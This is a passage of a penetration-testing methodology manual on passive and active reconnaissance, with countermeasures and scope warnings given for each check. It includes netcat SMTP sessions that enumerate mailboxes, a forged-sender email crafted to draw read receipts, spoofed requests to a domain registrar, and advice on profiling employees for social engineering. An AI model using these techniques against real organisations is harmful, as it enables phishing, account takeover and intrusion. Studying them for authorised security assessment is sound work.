Examine the target using search engines
Search Web groups
Search employee personal Web sites
Search Security & Exchange Commission and finance sites
Search uptime statistics sites
Search system/network survey sites
Search on P2P networks
Search on Internet Relay Chat (IRC)
Search job databases
Search newsgroups (NNTP)
Gain information from domain registrar
ƒ
Check for reverse DNS lookup presence
ƒ
Check more DNS information
ƒ
Check Spam database lookup
ƒ
Check to change whois information
Page 128 of 1123
B.1.1 Locate the Target Web Presence
Description
The first thing to do is to identify any online presence the target has using information from
initial contacts, e.g. e-mails, business cards, brochures, leaflets, etc.
Following this, you can take your contact’s e-mail address or the website from the business
card and/or brochure to gather more data.
Process
•
Find target in all common search engines (using business name)
•
Find Web presence (you may have this from the e-mail address already)
•
B2B – Web points of presence for business-to-business transactions (e.g. A partner
portal)
•
B2E – Web points of presence for business-to-enterprise communication (e.g. Webenabled intranet site)
•
B2C – Web points of presence for business to customer transaction (e.g. an ecommerce website)
Tips
Generally one will get the best results using various keyword combinations such as:
•
Target name
•
Location
•
Industry
•
Product type
•
Product lines/names
•
Contact names
Countermeasures
Have a policy describing what information should or should not be published on the public
website.
Links
Watching_the_Watchers_II-2 by j0hnny
Tools
Page 129 of 1123
The best choices in most situations are http://www.google.com, http://www.dogpile.com/,
www.alltheweb.com and http://www.infoseek.com.
http://www.kartoo.com - provides a good visual link between organizations and individuals.
Remarks
Page 130 of 1123
B.1.2 Examine Domain Name System - Find Out Domain Registration
Info and IP Block Owned
Description
Domain name and IP block information can be retrieved from ICANN assigned Regional
Internet Registries (RIR). ICANN stands for Internet Corporation for Assigned Names and
Numbers. It’s a non-profit organization, distributes domain names and IP addresses.
Domain Names are managed by many organizations:
Web Site
Country
www.internic.net
United States
www.nic.uk
United Kingdom
There are four Regional Internet Registries (RIR) assigned by ICANN, which are
responsible for allocating IP Addresses, domain names, autonomous system numbers…
•
APNIC - Asia-Pacific Network Information Center
•
ARIN - North and South America and sub-Saharan Africa
•
LACNIC - Latin American and Caribbean Internet Addresses Registry
•
RIPE NCC - Europe, the Middle East and parts of Africa
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Use general names (like postmaster)
•
Use general email addresses (like postmaster@company.com)
•
Use one single phone number that is normally not published to the outside world. If
calls are coming in on that phone line, you’ll know where they’ve found that number
…
Links
Tools
•
http://www.geektools.com/whois.php
•
http://whois.netsol.com
Page 131 of 1123
•
http://whois.sc
•
http://arin.com/whois.html
•
http://ripe.com/whois.html
•
www.samspade.org
•
http://www.cotse.com/
Remarks
Typically the RIR WHOIS databases will not locate any domain-related information or any
information relating to military networks.
Page 132 of 1123
B.1.3 Examine Domain Name System - Check for the Authoritative
Name Servers
Description
The Authoritative name server(s) for a certain domain(s) hold the zone file(s) for that
specific domain(s). This information is therefore important for performing zone transfers.
These authoritative name servers can be found in two separate ways. The first is through
the whois services, the second through the use of the DNS infrastructure.
Tools for use with the DNS infrastructure:
•
dig
•
nslookup
Examples/Results
# dig ns oissg.org @<random dns server>
; <<>> DiG 8.3 <<>> ns oissg.org @<random dns server>
; (1 server found)
;; res options: init recurs defnam dnsrch
;; got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 3
;; QUERY SECTION:
;;
oissg.org, type = NS, class = IN
;; ANSWER SECTION:
oissg.org.
2d22h14m44s IN NS a.ns.oissg.org.
oissg.org.
2d22h14m44s IN NS b.ns.oissg.org.
oissg.org.
2d22h14m44s IN NS c.ns.oissg.org.
;; ADDITIONAL SECTION:
a.ns.oissg.org.
2d22h14m44s IN A 212.13.198.37
b.ns.oissg.org.
2d22h14m44s IN A 212.158.214.187
Page 133 of 1123
c.ns.oissg.org.
2d22h14m44s IN A 212.13.198.38
C:\>nslookup
Default Server: <random dns server>
Address: <random dns server>
> set q=ns
> oissg.org
Server: <random dns server>
Address: <random dns server>
Non-authoritative answer:
oissg.org
nameserver = a.ns.oissg.org
oissg.org
nameserver = b.ns.oissg.org
oissg.org
nameserver = c.ns.oissg.org
a.ns.oissg.org internet address = 212.13.198.37
b.ns.oissg.org internet address = 212.158.214.187
c.ns.oissg.org internet address = 212.13.198.38
Analysis/Conclusion/Observation
The result of this step should be a list with all authoritative nameservers for the tested
company.
Countermeasures
No countermeasure, this is a prerequisite for the internet to work …
Links
Tools
•
dig
•
nslookup
Remarks
Typically the RIR WHOIS databases will not locate any domain-related information or any
information relating to military networks.
Page 134 of 1123
The whois services also show you the authoritative name servers for the domain you
performed a whois of.
Page 135 of 1123
B.1.4 Examine Domain Name System - Check for Reverse DNS lookup
presence
Description
Reverse DNS lookup will obtain the authoritative name server(s) for a certain domain(s)
hold the zone file(s) for that specific domain(s). This information is therefore important for
performing zone transfers.
Reverse DNS lookup uses an IP address instead of the domain name of a server.
Tools for use with the DNS infrastructure:
•
dig
•
nslookup
Examples/Results
Analysis/Conclusion/Observation
The result of this step should be a list with all authoritative nameservers for the tested
company.
Countermeasures
Disable DNS at the server configuration If possible. It is not a prerequisite for network
operation.
Links
Check some more DNS information
•
http://www.dnsstuff.com
•
http://www.dnsreport.com
Tools
•
nslookup
•
dig
•
Host
•
whois.sc reverse DNS tool (requires free registration)
Remarks
Page 136 of 1123
Just because a host has forward DNS from name to address there's no guarantee or
requirement for it to have reverse DNS from address to name. Many sites do, many sites
don't.
Page 137 of 1123
B.1.5 Examine Domain
databases lookup
Name
System
-
Check
Spam/Attackers
Description
By checking for the presence of IP addresses in spam and attackers (hacking, viruses) lists
a consultant can quickly determine if there has been a policy violation or probable intrusion.
Process
Create a list of ip addresses that include at least mail and web server addresses (these
addresses can be obtained during other information gathering checks). Search public
Spam blacklists for these addresses, such as:
•
Spamhaus
•
Spamcop
•
RBL’s
•
SANS ISC
Look for spam information using public search engines, and queries involving the IP
addresses and the word SPAM, (e.g. “127.0.0.1 spam“).
Analysis/Conclusion/Observation
The appearance of an IP address in these lists is an indication of probable policy violation,
either by Company personnel or even intrusion.
Countermeasures
•
Links
•
www.spamhaus.org
•
www.spamcop.net
•
rbls.org
•
isc.sans.org
•
www.dshield.org
Tools
Public spam black lists, attackers/virus distribution lists on the Internet and search engines.
Page 138 of 1123
Page 139 of 1123
B.1.6 Examine Domain Name System - Check to change whois
information
Description
Registrar gives two options for authentication
•
A mail from Point of Contact (PoC)
•
A mail signed with PGP
If a spoofed mail is sent masquerading as PoC, registrar will change the whois information
according to the instructions in the e-mail. Read the Remarks section carefully before
proceeding with this test.
Process
Process
•
Send a spoofed e-mail masquerading as PoC to the Registrar.
•
Alternatively, send the request through the Registrar’s Web interface, if available.
Analysis/Conclusion/Observation
Being able to change whois information without proper authorization is considered an
important vulnerability.
Countermeasures
•
Establish change procedures for whois information with registrar
•
Restrict access to contact information for changes in registrar
•
Avoid using information from an individual (name, email) for contact information;
use a position and generic accounts (email specific for this task) instead.
Links
•
www.internic.net/regist.html
Tools
•
telnet client (manual spoofing with smtp protocol)
•
netcat (manual spoofing with smtp protocol)
•
scripts for automating email spoofing
Remarks
This check involves a third party and could have an impact on the client’s operation, if
successful. Make sure that the contract is able to support this activity with the third party
(Registrar), and that it lies within the scope defined at the contract, otherwise DO NOT
Page 140 of 1123
proceed with this test.
Sometimes, the organization being assessed will have a contract allowing it to test the
security of infrastructure and services provided by third parties. It is common that this
contract allows another third party (consultant) to perform the security assessment.
An alternative to asking for changes is to send an email that just informs that changes be
done in the future (e.g. a week later). The registrar will either inform that they will make
changes or try to authenticate the request through approved means (e.g. by telephone).
Page 141 of 1123
B.1.7 Search Job databases
Description
Just like regular search engines, job search sites could reveal a plethora of information on
technology and services running on the target’s internal network. A pen-assessor should
carefully review the job postings published by the target on their own website or on other
popular job search sites.
Process
•
Check for resumes available on the target website
•
Check various job databases
•
Search using search engines
•
Check for job postings on the target website
•
Check for job postings on job sites
•
Gather all e-mail addresses, phone numbers, and contact details
•
Focus on resumes/ads where technology experience is required
•
Try to correlate technologies with the target’s product information gained from the
aforementioned steps
•
Gain more information on their business structure from such postings
•
Confirm to their B2B / B2E / B2C – gained from aforementioned topics.
Analysis/Conclusion/Observation
Depending on the kind of information found, the results of this test my reveal information
rated low to high. Finding critical information through this test might indicate the lack of
appropriate information protection.
Countermeasures
•
Establish clear and formal confidentiality agreements
Links
•
Monster and its country specific sites
•
www.flipdog.com
•
Google Jobs
•
www.careerbuilder.com
Europe
•
www.stepstone.com
Page 142 of 1123
Germany
•
www.jobpilot.de
•
www.jobstairs.de
Tools
•
Any web browser
Page 143 of 1123
B.1.8 Examine target using Search Engines
Description
Search engines can be used to gather interesting information about a target while
protecting one’s anonymity. These search engines should be used for regular websites as
well for searching newsgroup archives.
Process
•
Search for the domain name preceded by the @ symbol (@target.com), to scour email addresses within the target organization and to build a database of from them
•
Add all e-mail addresses gathered from initial conversations with the customer to
the database
•
Search for target organization's (complete) e-mail addresses gathered from the
previous two steps on Web search engines and in groups in order to profile each
employee
•
Search for employee names if they are part of the e-mail addresses on Web search
engines and in groups
•
Attempt to bypass authentication using search engines
•
Review target Website using search engines’ cache in order to evade the target’s
logs.
o
Check partners (to find out technologies used)
o
Check other than main pages (sub domains/folders)
o
ƒ
services.target.com
ƒ
support.target.com
ƒ
target.com/support
ƒ
target.com/sales
Collect
ƒ
•
Names, phone numbers, e-mail addresses
o
Recent activities/happenings
o
Technologies used
Gaining personal information on a specific employee from the target’s website can
be beneficial for conducting social engineering. Moreover, personal resumes on the
target’s website can give insight into the technologies used.
•
Search for e-mails from their domain posted in the mail groups and that reveal
Page 144 of 1123
information regarding the internal network architecture.
•
Browse through news-search services to get more information on their business
structure.
•
Probe into their B2B / B2E / B2C – which might be helpful insight into the trust
relationship of their network.
•
Scan through all the e-mail-signatures to gain all possible e-mail and phone number
information. This could be used in later stages for war-dialing or social engineering.
•
Familiarize oneself with company specific information such as: an organizational
map with details of senior managers, company’s product names, and details.
•
Finally, put all information together into the organizational map started in the
previous step
•
Search newsgroup postings for information related to the target
•
Pay special attention to technical newsgroups (comp.*)
•
Search for technical questions in newsgroups
•
Collect the following:
o
E-mail addresses,
o
Names,
o
Addresses,
o
Phone Numbers
•
Carry out a search by author
•
Check group archives (derkeiler, freenet.de google)
Important Group list
•
o
Google groups
o
Yahoo groups
o
Mailing lists and archives
o
Microsoft online NNTP servers
o
Linux user community
o
Security product groups/mailing lists
o
Networking group/mailing lists (vendor specific/industry standard)
Using Search engine to identify target users
o
•
Determine all of the servers Search engine knows of www.segress.com
o
•
E.g. +"www.oissg.org" +phone +fax
E.g. segress site:.segress.com
Determine all the indexed directories listed in *.segress.com
Page 145 of 1123
allintitle: "index of /" site:.segress.com
Analysis/Conclusion/Observation
After examining target using search engine, an initial understanding of the target should be
realized.
Countermeasures
•
Apply appropriate exclusions in robots.txt files for pages that has personal and
sensitive information (this information would still be available for users of the site
but won’t be collected by most web spiders and won’t show up in those search
engines).
•
Remove confidential/sensitive content found through web searching. Alternatively,
place that content behind appropriate access control mechanisms.
Links
Watching_the_Watchers_II-2 by j0hnny
•
http://www.google.com/help/operators.html
•
http://www.robotstxt.org/wc/exclusion.html
Tools
•
Any browser
Remarks
Removed content might still appear for some time in web search engines for some time
due to web caches.
Knowing the syntax, limitations and commands for each web search engine used is
important to get the best results; using several web search engines will also improve
results.
Page 146 of 1123
B.1.9 Search Security & Exchange Commission and Finance sites
Description
It is trivial to gather the financial information of a public company to complete its profiling.
This gives the attacker a better image of the target. Public organizations are bound to file
10-Q, 10-K reports.
Process
ƒ
Check for merger information
ƒ
At the time of mergers, the chances of inappropriate security handling is higher
ƒ
Higher chances of social engineering
ƒ
Merged network may indulge some interesting information
ƒ
Check for recent activities
ƒ
Check for partner information
Analysis/Conclusion/Observation
Information gathered through this means might indicate:
•
Times at which infrastructure might be more vulnerable to attacks (e.g. IT
integration after merger)
•
Probable systems relationships (e.g. a hacker attacks a partner with lower security
and then tries to hack it’s way in, through system trust relationships)
Countermeasures
•
Apply appropriate security measures to all connections with partners (don’t take for
granted that their security will be enough)
•
Include special information security procedures in all IT changes, during mergers
and acquisitions
Links
Security & Exchange Commission
United States
•
US http://www.sec.gov/
•
US http://www.freeedgar.com
India
•
India http://www.sebi.gov.in/
Pakistan
•
Pakistan http://www.secp.gov.pk/
Page 147 of 1123
Nigeria
•
Nigeria http://www.secngr.org/
Finance Sites
•
http://finance.yahoo.com
•
http://www.hoovers.com
•
http://www.companysleuth.com
Tools
•
Any Web browser
Remarks
Access to some specific details of financial operations might be restricted. The assessor
should limit her/his search to public information.
Page 148 of 1123
B.1.10
Search System/Network Survey Sites
Description
System/Network survey site, e.g. Netcraft http://www.netcraft.com, gives excellent
information about uptimes, operating systems, Web Server and netblock used.
Process
•
Gather Web-Server Information and find out what web server / operating system site is
running
•
What is the IP Address and Net-block owner
•
SSL Version and other information like certificate currently in use
Analysis/Conclusion/Observation
Information gathered through this test will give details regarding the brands of operating
systems, web servers, uptime, and traffic volume. This information will be used to better
tune other test (e.g. port scanning and vulnerability scanning).
Countermeasures
Change default banners provided by network services visible from the internet.
Links
•
www.netcraft.com
Tools
•
Any web browser
Remarks
Search at www.netcraft.com allows limited searches from specific IP address every day.
Although proposed countermeasures are by no means strong, they will help other security
controls in place by delaying any attacker or forcing him to do more noisy recognition and
scanning activities. This, in turn, will increase the probability that illegal activities are
detected promptly.
Page 149 of 1123
B.1.11
Search Uptime Statistics Sites
Description
Search for information on uptime in graphs and statistics available on the Internet.
Process
Sometimes you will find the Big Brother monitoring administration panel on the target
website. This can be searched via search engines and/or archives of the target website.
•
Search for uptime or network statistics through search engines
•
Collect IP addresses and network diagrams that might be mentioned in the statistics
Page
•
Collect any other relevant information on the statistics page (e.g. O.S. and
application brands)
•
Take note of reboots of the system since they could indicate an important security
event (i.e. last reboot might indicate the last time a critical security update was
applied, for some Operating Systems).
Analysis/Conclusion/Observation
Uptime information should not be available to the public since it would help an attacker to
determine important events and information useful to be more successful.
For a consultant assessing an organization, this information can be useful to prepare
specific tests with a higher degree of success.
Countermeasures
•
Move statistic information from networks to the internal net and restrict its access so
that only authorized personnel can consult/edit it.
Links
•
http://maclawran.ca
•
Big Brother System and Network Monitor
Tools
•
Any web browser
Remarks
Page 150 of 1123
B.1.12
Search on P2P networks
Description
Most of today’s P2P Networks are decentralized. As per its decentralized nature, it is tough
to stop the spread of information that is shared once. Many P2P clients (e.g. eMule, KaZaa,
Grokster, BitTorrent, Soulseek, eDonkey) are available on the Web.
Process
•
Search target’s information (confidential documents)
•
Search target’s products
•
Search target’s network/resource used as P2P component
Analysis/Conclusion/Observation
P2P client programs might establish connections through which some resources are
accessible to the Internet. Resources and networks that were protected by firewalls are
becoming increasingly vulnerable to hacking and malware attacks to P2P connections
initiated from the inside.
It is therefore important to regulate and limit the use of P2P networks to only authorized
activities.
Countermeasures
The spread of information cannot be stopped completely but can be limited by sabotage.
•
Spread fake files
Spreading bogus files with names similar to the file one wants to limit the spread of,
may discourage some p2p users.
•
Monitor source download information, contact ISPs, single out and sue people in
court
•
Practice bounty hunting encouraging people do denounce others who download a
file
•
Block P2P traffic at your border gateway(s) and/or on your internal filters.
Links
•
Emule
•
KaZaA
•
Grokster
Page 151 of 1123
•
BitTorrent
•
Soulseek
•
eDonkey
Tools
•
Any web browser
Remarks
Even if the assessment will only search for public information, make sure that the P2P
accounts to be assessed are used in machines located at and property of the target
organization. Check for example the IP address of the equipment against the organization’s
domain (if the protocol allows it).
Page 152 of 1123
B.1.13
Search on Internet Relay Chat (IRC)
Description
The identification of users chatting in IRC rooms could provide alternative means to get
inside a network, evading perimeter controls (i.e. firewall and IDS). Find users using IRC
and try to exploit this to get information or an alternate entrance to the corporate network
Process
•
Find employees lurking around in IRC
•
Search info in support rooms of IRC
•
Search IRC Logs
•
Search IRC Employees running IRC bots from target
Analysis/Conclusion/Observation
Similarly to P2P network, Internet Relay Chat connections provide not only means to talk
with other people but also to share files. Several worms exploit known vulnerabilities or
make use of social engineering to spread through this protocol.
The use of IRC within a company, might also indicate a probable violation of corporate
policy (if it is being don from equipment property of the target organization).
Countermeasures
•
Block IRC protocol at the border (i.e. routers, firewalls)
•
Establish clear and precise policies regarding the use of this kind of protocols
Links
Tools
•
Any IRC client
Remarks
Try to be passive while performing this test (i.e. do not actively question users using social
engineering). Active testing should be done at other stages of the Assessment.
Page 153 of 1123
B.1.14
Search Underground Sites
Description
Search underground sources of information for data relevant to the target organization’s
assessment.
Process
Identify relevant underground information sources (e.g. hacking groups with records of
hacks for financial organizations might be useful if the target is organization is Bank);
search for relevant information in places like:
•
Email lists
•
IRC channels and chats
•
Web forums
•
FTP sites
While performing these tasks, take into consideration:
•
Law enforcement agencies might be watching as well (i.e. be extremely careful with
anything you say/write; preferably, don’t say anything, just listen and read)
•
Underground groups are usually closed and very selective; do not attempt to force
your way in
•
Never reveal your target’s name or give any information that might reveal it’s
identity. Same recommendation for your identity and employer.
Analysis/Conclusion/Observation
Information gathered through these means might be extremely useful for certain
organizations, under some assessment engagements and circumstances. The kind of
information that could be useful includes (although it is not restricted to):
•
Information on hacking attempts (successful or not) by other parties (e.g. hackers)
•
Information on new hacking techniques and tools relevant to the assessment (i.e.
that apply to current Target’s infrastructure, that you might have identified through
other enumeration tests)
•
Confidential/restricted/unexpected information about the target organization or
relevant organizations that you might find in the hands of third parties (e.g. email
lists for spamming that include a huge amount of email addresses from the target
organization)
Page 154 of 1123
•
Fraud plans or plots involving the target organization or related organizations.
Countermeasures
Organizations should:
•
Restrict confidential information leaks by implementing appropriate policies and
security controls
•
Report to law enforcement illegal activities where their involvement is necessary
Links
•
Tools
•
Web browsers
•
Ftp, telnet, irc clients
Remarks
This check is not recommended for small size penetration test. For big size companies, the
assessor should make sure that the target organization approves this kind of test and is
informed of any relevant information immediately.
Page 155 of 1123
B.1.15
Search News Groups (NNTP) and Email lists
Description
Search product specific mailing lists. You will likely find valuable information there.
Download all product specific e-mails and perform an offline search.
Process
•
Download all NNTP groups relating to technology in place
•
Perform an offline search based on e-mail address, name, phone number, etc…
•
Copy relevant Mailing lists posts from public sites (i.e. posts that discuss technology
or problems at the assessed organization).
Analysis/Conclusion/Observation
Check all discovered information for mails which contain system information or other
relevant information (sys admin having troubleshooting something …)
Countermeasures
•
keep your employees from using their business e-mails to sign-up for groups and
mailing lists
•
Set up policies that require employees to avoid disclosing infrastructure information
in public sites
Links
•
news://msnews.microsoft.com
•
news://news.support.veritas.com/dnewsweb.exe
•
http://www.google.com (discussion groups)
•
http://www.securityfocus.com (forums)
Tools
•
Any web browser (most public email lists are available in the web)
Remarks
This activity can be very time consuming (i.e. reading through all posts from employees
working for the target company), depending on the volume of messages in the lists. The
assessor should be very selective with the lists it will choose in order to increase the
probability of finding something useful while decreasing the time required to read all posts.
Page 156 of 1123
B.1.16
Search Index Sites
Description
Index sites maintain copy of web sites. It can be used to gather information without going to
target and It can also be used to gather information from previous copy of web sites.
Process
•
Search for common web servers and download cached content available on index
sites
•
Compare with current content of the site and note differences
•
Analyze and document changes (e.g. date of last update, changes in scripts)
Analysis/Conclusion/Observation
Differences between current content and cached content my indicate useful things, such
as:
•
Frequency of web content updates
•
New or deprecated content
•
New or deprecated forms or functions (new functions/scripts might be vulnerable,
still underdevelopment, or give some indications on other new related systems.
Countermeasures
Organizations should restrict web spiders from accessing and storing web forms and
restricted information (e.g. by setting the appropriate parameters in robots.txt file).
Links
www.dogpile.com
www.alexia.com
www.archive.org
Tools
•
Any web browser
Remarks
Depending on the caching technique used by indexing services, the copy of the sites could
be complete or partial.
Page 157 of 1123
B.1.17
Search Employee's Personal Web Sites
Description
By searching for name, personal e-mail addresses, hobbies, and other personal
information, you can find employee’s personal websites.
Process
•
Search for employees names (i.e. names included in web pages that show up by
searching for information on the target organization).
•
Identify employees’ personal web sites
•
Gather information from these websites
For example, try http://Firstname.Lastname.com and so on (.net .org, with hyphen, etc.).
Analysis/Conclusion/Observation
Employees tend to include information related to their work and employer on their personal
web sites and blogs. This information can be useful for subsequent phases of the
assessment.
Countermeasures
•
Implement security policies that restrict the type and amount of information from the
target organization, that people are allow to disclose
Links
•
www.dogpile.com
•
www.alexia.com
•
www.google.com
Tools
•
Any web browser
Remarks
Page 158 of 1123
ACTIVE INFORMATION GATHERING
Examining organizations using publicly available sources is legal in many countries but
active information gathering may not.
B.1.18
Email Systems – User Account Enumeration
Description
Identify valid email accounts by connecting to the email server of the target company.
Process
Some email address should have been identified using passive information gathering tests;
use this information to identify additional email addresses:
•
Identify user account structure (i.e. how the email addresses are formed; e.g.
<name>-<lastname>@domain, <initial><lastname>@<department>.domain)
•
Create a list of names and test probable structure (i.e. with names of employees
whose email address was not found on the web, test the structure pattern)
•
Connect to the target’s email server (SMTP or POP3) and verify the existence of
such addresses (e.g. using “verify” and “expn” commands, or spoofing “rcpt to” and
”mail from” tags)
Examples/Results
# nc -vv mailserver.target 25
mailserver.target [X.X.X.X] 25 (smtp) open
220 TARGET Mail Server
EHLO ASSESSOR
250-mailserver.target
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-AUTH LOGIN PLAIN GSSAPI
250-AUTH=LOGIN PLAIN GSSAPI
250-XVERP
250 8BITMIME
verify username
Page 159 of 1123
502 Error: command not implemented
mail from:<assessor@pentester.company>
250 Ok
rcpt to:<username@any_other.testdomain>
554 <username@any_other.testdomain>: Recipient address rejected: Relay access denied
rcpt to:<invalid_username@correctdomain.target>
550 <invalid_username@correctdomain.target>: User unknown
rcpt to:<invalid-username@correctdomain.target>
550 <invalid-username2@correctdomain.target>: User unknown
rcpt to:<correct-username@correctdomain.target>
250 Ok
rcpt to:<correct-username2@correctdomain.target>
250 Ok
quit
221 Bye
sent xxxx, rcvd xxxx
Analysis/Conclusion/Observation
Similar techniques are used to create spamlists and for social engineering/phishing attacks.
The existence of an easily identifiable structure facilitates the use of email addresses for
illegal activities, like those mentioned before. However, this is not a critical vulnerability and
many organizations must have such structures to comply with standardization
requirements.
The information however will be useful for the assessor since this will provide her/him with
potential vulnerability vectors for other tests. E.g. you will be able to get and verify the
existence of an email address for an important person (CIO, CEO, etc.) whose name you
found, but whose email address was not easily available.
Countermeasures
•
Some organizations might we willing to add a random element to the email address
structure to make spamming and phishing activities more difficult to accomplish and
more easy to detect. While this measure is to some degree effective, it has also an
aesthetic impact on the email address and is therefore avoided in many
organizations.
•
Implement policies to restrict the disclosure and use of email address (e.g. some
Page 160 of 1123
companies are not including email addresses on business cards anymore; instead,
they ask their employees to write it down only if it is required for business
communications).
•
Put intrusion detection systems to detect email gathering activities on the email
server (e.g. connections using commands such as “verify” or probing several
existent and non-existent email addresses through “mail from:” “mail to:”
commands.
•
Put filters to thwart information gathering (e.g. disable unnecessary SMTP
command, disable email relaying capabilities, use connection timeouts, etc.)
Links
Tools
•
Rcpt2 (smtp “rcpt to” enumeration tool)
•
Vrfy (smtp “VRFY” command enumeration tool)
•
Netcat and telnet for manual tests
•
Custom scripts for automated tests
Remarks
Page 161 of 1123
B.1.19
SMTP Headers Analysis – Email Received from Target
Description
Extract useful information from SMTP headers included in legitimate email sent from target.
Process
Obtain emails from the target organization:
•
Search the web for emails with full headers, coming from the target organization
•
Send email to email addresses with automated responses (e.g. mail lists
majordomos and client support addresses)
•
Apply social engineering to an email address with the intent of obtaining a legitimate
response
•
Use email communication from the target organization (e.g. emails from the people
in charge of the assessment project directed to the assessors)
Analyze the headers and correlate information:
•
Extract email servers and gateway addresses, paying special attention to names,
since they often reveal useful information (e.g. “Received: from antivirusgw
(antivirusgw.domain.target
[XXX.XXX.XXX.XXX])”)
•
Record the mail path (i.e. mail servers between the sender and the receiver)
•
Record ip addresses and correlate against information gathered through other tests
(e.g. an IP address that shows up in the headers might have been previously
identified as a server with other function, such as a DNS server or a firewall. This
might help identify multipurpose servers and application proxies).
Analysis/Conclusion/Observation
Information on email headers can be useful to:
•
Identify network resources
•
Map the perimeter of the target organization’s network
•
Identify characteristics, uses and relationships of some network resources of the
target organization
Countermeasures
To reduce unnecessary information leak, organizations should ensure that:
•
Names of network resources included in email headers do not give
more
information than necessary (i.e. avoid names that describe purpose, brand, location
Page 162 of 1123
or applications of these resources to the internet; use aliases for internal
administration where appropriate)
•
Internal network addresses should be filtered (i.e. reserved address ranges use for
internal networking)
•
Avoid single points of failure, whenever possible (i.e. servers that have several
important network services, like mixing DNS, SMTP and WEB)
Links
•
http://www.stopspam.org/email/headers.html
•
http://www.faqs.org/faqs/net-abuse-faq/spam-faq/
Tools
•
Any web browser
•
Email client capable of showing email headers
Remarks
Page 163 of 1123
B.1.20
SMTP Headers Analysis – Bounced E-mail
Description
Elicit bounced email and analyze SMTP headers included in replies from mail server
postmaster accounts.
Process
Generate and send emails that will elicit bouncing:
•
Send email to non-existent recipients at the target organization’s domain (i.e. elicit
responses from mail servers)
•
Send huge email to a valid email address so that it will be rejected because of its
size
Analyze the headers and correlate information:
•
Extract email servers and gateway addresses, paying special attention to names,
since they often reveal useful information (e.g. “Received: from antivirusgw
(antivirusgw.domain.target
[XXX.XXX.XXX.XXX])”)
•
Record the mail path (i.e. mail servers between the sender and the receiver)
•
Record IP addresses and correlate against information gathered through other tests
(e.g. an IP address that shows up in the headers might have been previously
identified as a server with other function, such as a DNS server or a firewall. This
might help identify multipurpose servers and application proxies).
Analysis/Conclusion/Observation
Information on email headers can be useful to:
•
Identify network resources
•
Map the perimeter of the target organization’s network
•
Identify characteristics, uses and relationships of some network resources of the
target organization
Countermeasures
To reduce unnecessary information leak, organizations should ensure that:
•
Names of network resources included in email headers do not give
more
information than necessary (i.e. avoid names that describe purpose, brand, location
or applications of these resources to the internet; use aliases for internal
administration where appropriate)
Page 164 of 1123
•
Internal network addresses should be filtered (i.e. reserved address ranges use for
internal networking)
•
Avoid single points of failure, whenever possible (i.e. servers that have several
important network services, like mixing DNS, SMTP and WEB)
Links
•
http://www.stopspam.org/email/headers.html
•
http://www.faqs.org/faqs/net-abuse-faq/spam-faq/
Tools
•
Scripts and tools to create altered emails
•
Email client capable of showing email headers
Remarks
Page 165 of 1123
B.1.21
SMTP Headers Analysis – Read Receipt
Description
Elicit read receipts from legitimate email accounts and analyze SMTP headers included in
replies from mail server postmaster accounts.
Process
Generate spoofed email to elicit read receipts:
•
Create an email with a spoofed “from” field so that it might be known to the recipient
(e.g. use an email from the same domain as the recipient). The “mail from” header
field should retain the legitimate assessor’s email address.
•
Alternatively, send a spoofed address with legitimate addresses from the same
domain as the recipient but add a “reply to” field with an email address from the
assessor.
•
Activate read receipt option
Examples/Results
# nc -vv mailserver.target 25
mailserver.target [X.X.X.X] 25 (smtp) open
220 TARGET Mail Server
EHLO ASSESSOR
250-mailserver.target
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-AUTH LOGIN PLAIN GSSAPI
250-AUTH=LOGIN PLAIN GSSAPI
250-XVERP
250 8BITMIME
mail from:<assessor@pentester.company>
250 Ok
rcpt to:<correct-username@correctdomain.target>
250 Ok
data
Page 166 of 1123
354 Enter mail, end with a single ".".
From: "Trusted User" <forged@ correctdomain.target >
To: "Correct Username" < correct-username@correctdomain.target >
Read-Receipt-To: " Trusted User " < assessor@pentester.company >
Disposition-Notification-To: " Trusted User " < assessor@pentester.company >
Subject: Read Receipt Header Test
This text should motivate “Correct Username” to confirm reception of email message.
.
250 2.5.0 Ok.
quit
221 Bye
sent xxxx, rcvd xxxx
Analysis/Conclusion/Observation
Information on email headers can be useful to:
•
Identify network resources
•
Map the perimeter of the target organization’s network
•
Identify characteristics, uses and relationships of some network resources of the
target organization
Countermeasures
To reduce unnecessary information leak, organizations should ensure that:
•
Names of network resources included in email headers do not give
more
information than necessary (i.e. avoid names that describe purpose, brand, location
or applications of these resources to the internet; use aliases for internal
administration where appropriate)
•
Internal network addresses should be filtered (i.e. reserved address ranges use for
internal networking)
•
Avoid single points of failure, whenever possible (i.e. servers that have several
important network services, like mixing DNS, SMTP and WEB)
•
Put policies in place that require all users to report suspicious activity immediately
•
Provide basic training to users to help them identify forged emails (e.g. viruses,
phishing attacks, scams, social engineering, etc.)
Page 167 of 1123
Links
•
http://www.stopspam.org/email/headers.html
•
http://www.faqs.org/faqs/net-abuse-faq/spam-faq/
•
http://www.ietf.org/rfc/rfc2298.txt
•
http://www.ninebynine.org/IETF/Messaging/HdrRegistry/mail/Read-Receipt-To.html
Tools
•
Scripts and tools to create altered emails
•
Email client capable of showing email headers
Remarks
Page 168 of 1123
B.1.22
Perform BGP (Border Gateway Protocol) Query
Description
•
De facto routing protocol on the Internet for large networks/ISPs
•
Identified by ASN (equivalent to handle)
•
We can query an ASN numbers for additional information
•
May provide additional addresses/networks
Examples/Results
Determine ASN number
•
whois “ASN <target>”@whois.arin.net
Determine Network Ranges by connecting to border router
•
telnet <target>
•
show ip bgp <regexp_ASN$>
•
show ip bgp regexp_46$
Analysis/Conclusion/Observation
BGP enumeration may provide additional addresses and network information to both
attackers and assessors.
Countermeasures
•
Ideally, a secure version of the protocol should be implemented; however, SBGP
and SOBGP have still not been widely accepted as a standard (performance and
implementation costs). However, organizations should be aware that such protocols
might be adopted eventually to counter security risks.
•
Block ICMP echo requests at the firewall or external router
•
Block UDP packets at the firewall
•
Allow traffic in through the firewall only to specific hosts
Links
•
http://www.cisco.com/univercd/cc/td/doc/product/software/ios123/123cgcr/iprrp_r/ip
2_s2g.htm#wp1039007
•
https://www.cs.darthmouth.edu/~zhaom/research/papers/TR2003-440.pdf
Tools
•
whois
Page 169 of 1123
•
telnet
•
netcat
Remarks
Many organizations do not run BGP. If this is the case, no ASN records will be available.
When getting ASN records with whois, depending on your version of whois, different
commands can be used. The second line for each option illustrates the use of specific
queries by specifying object types (e.g. NET, ASN); x.x.x.x is the IP address:
•
whois x.x.x.x@whois.arin.net
•
